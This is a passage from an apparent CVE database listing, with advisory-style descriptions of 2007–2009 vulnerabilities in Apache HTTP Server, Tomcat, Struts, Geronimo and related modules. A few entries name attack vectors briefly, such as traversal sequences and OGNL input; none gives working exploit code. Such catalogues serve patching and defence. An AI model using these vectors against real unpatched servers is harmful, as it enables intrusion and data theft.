6304| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
6305| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
6306| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
6307| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
6308| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
6309| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
6310| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
6311| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
6312| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
6313| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
6314| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
6315| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
6316| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
6317| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
6318| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
6319| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
6320| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
6321| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
6322| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
6323| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
6324| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
6325| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
6326| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
6327| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
6328| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
6329| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
6330| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
6331| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
6332| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
6333| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
6334| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
6335| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
6336| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
6337| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
6338| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
6339| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
6340| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
6341| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
6342| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
6343| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
6344| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
6345| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
6346| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
6347| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
6348| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
6349| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
6350| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
6351| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
6352| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
6353| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
6354| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
6355| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
6356| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
6357| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
6358| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
6359| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
6360| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
6361| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
6362| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
6363| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
6364| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
6365| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
6366| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
6367| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
6368| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
6369| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
6370| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
6371| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
6372| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
6373| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
6374| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
6375| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
6376| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
6377| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
6378| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
6379| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
6380| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
6381| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
6382| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
6383| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
6384| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
6385| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
6386| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
6387| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
6388| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
6389| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
6390| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
6391| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
6392| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
6393| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
6394| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
6395| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
6396| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
6397| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
6398| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
6399| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
6400| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
6401| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
6402| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
6403| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
6404| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
6405| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
6406| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
6407| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
6408| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
6409| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
6410| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
6411| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
